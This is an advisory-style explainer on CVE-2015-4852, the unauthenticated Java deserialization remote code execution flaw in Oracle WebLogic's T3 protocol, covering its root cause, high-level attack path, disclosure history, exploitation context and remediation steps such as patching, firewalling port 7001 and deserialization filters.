CVE-2015-4852

What Is Oracle WebLogic Server?

Oracle WebLogic Server is a Java EE application server widely deployed in enterprise and government environments to host Java web applications, web services, and enterprise business logic. WebLogic serves as the application runtime for many mission-critical enterprise systems — ERP backends, banking applications, government portals, and Oracle Fusion Middleware. As a core part of the Oracle Fusion Middleware stack, WebLogic is deeply embedded in enterprise Java architectures worldwide.

WebLogic uses the T3 protocol — a proprietary Oracle protocol for inter-JVM communication, cluster management, and remote EJB invocation — which listens by default on port 7001. T3 accepts serialized Java objects from remote clients, making it a natural entry point for Java deserialization attacks.

Overview

CVE-2015-4852 is a critical unauthenticated remote code execution vulnerability in Oracle WebLogic Server caused by unsafe Java deserialization of objects received over the T3 protocol (and HTTP endpoints). The root cause is WebLogic's use of Apache Commons Collections — a widely-deployed Java library with known "gadget chains" that transform deserialized objects into arbitrary code execution. An unauthenticated attacker can send a malicious serialized Java object to WebLogic's T3 listener and achieve code execution as the WebLogic service account. Oracle addressed the vulnerability in the January 2016 Critical Patch Update. CVE-2015-4852 was included in the inaugural CISA KEV catalog launch on November 3, 2021.

Affected Versions

Oracle CPU January 2016 and subsequent patches address CVE-2015-4852. Any current WebLogic installation with cumulative patches applied is protected.

Technical Details

Root Cause: Java Deserialization via Apache Commons Collections

Java object deserialization converts a byte stream back into a Java object graph. When an application deserializes objects from untrusted input, any class in the JVM classpath can be instantiated as part of the deserialization process — not just the expected object type. Apache Commons Collections included InvokerTransformer and related classes that could be chained together into a "gadget chain": a sequence of class instantiations and method invocations triggered during deserialization that ultimately execute arbitrary OS commands.

The attack path for CVE-2015-4852:

1. Attacker constructs a malicious serialized Java object payload using an Apache Commons Collections gadget chain (e.g., using the ysoserial tool)
2. Attacker sends the payload to WebLogic's T3 port (default: 7001) — no authentication required for T3
3. WebLogic deserializes the incoming T3 message, triggering the gadget chain
4. Code execution occurs in the context of the WebLogic JVM process — typically running as a service account with broad filesystem access

The T3 protocol was designed for trusted cluster communication and performs no authentication before deserializing incoming data.

Broader Deserialization Epidemic

FoxGlove Security's November 2015 research paper demonstrated that the same Apache Commons Collections gadget chains affected not just WebLogic, but also IBM WebSphere (CVE-2015-7450), JBoss/WildFly, Jenkins (pre-fix), and OpenNMS — any Java application that used this library and accepted serialized objects from the network.

Attack Characteristics

Discovery

Gabriel Lawrence and Chris Frohoff of FoxGlove Security published their research "What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability." on November 6, 2015, publicly disclosing the Apache Commons Collections gadget chains and demonstrating exploitation against multiple Java application servers including WebLogic.

Exploitation Context

• Inaugural CISA KEV: CVE-2015-4852 was included in the first CISA KEV catalog published November 3, 2021 — selected because of sustained, ongoing exploitation nearly six years after disclosure, underscoring how long Java deserialization vulnerabilities remain exploitable in enterprise environments with poor patch hygiene
• Cryptomining and ransomware: WebLogic deserialization vulnerabilities including CVE-2015-4852 and successor CVEs (CVE-2017-10271, CVE-2019-2725) have been consistently exploited for cryptominer deployment (Monero miners) and ransomware staging; WebLogic servers running as privileged service accounts provide a powerful beachhead for lateral movement
• Persistent WebLogic attack class: Oracle has patched numerous subsequent WebLogic deserialization CVEs; attackers rotate between them as organizations patch specific CVEs but leave related vectors open; organizations running WebLogic should treat the entire deserialization attack class as an ongoing threat
• Enterprise Java exposure: The broader Apache Commons Collections deserialization problem affected essentially every Java EE application server in production in 2015, representing one of the most significant Java ecosystem security events
• CISA KEV (2021): Added November 2021

Remediation

1. Apply Oracle CPU patches — install Oracle Critical Patch Update January 2016 or a later CPU. Any current WebLogic installation with cumulative patches applied is protected against CVE-2015-4852 and subsequent deserialization CVEs.

2. Restrict T3 protocol access — firewall WebLogic's T3 port (default 7001) to allow access only from known cluster members and authorized management hosts. The T3 port should never be internet-accessible.

3. Enable WebLogic T3 filtering — Oracle provides a T3 protocol filter that can block deserialization of unknown class types. Configure the WebLogic connection filter to restrict T3 access.

4. Upgrade Apache Commons Collections — update to Apache Commons Collections 3.2.2 or 4.1+, which include serialization safeguards.

5. Apply JEP 290 serial filters — Java 9+ and backported JEP 290 implementations allow configuring a JVM-wide deserialization filter that rejects unexpected class types before they can be instantiated.

6. Monitor for exploitation — detect post-exploitation indicators: unexpected child processes spawned by the WebLogic JVM, new scheduled tasks or cron jobs, cryptominer processes, or outbound connections from the WebLogic server to unusual destinations.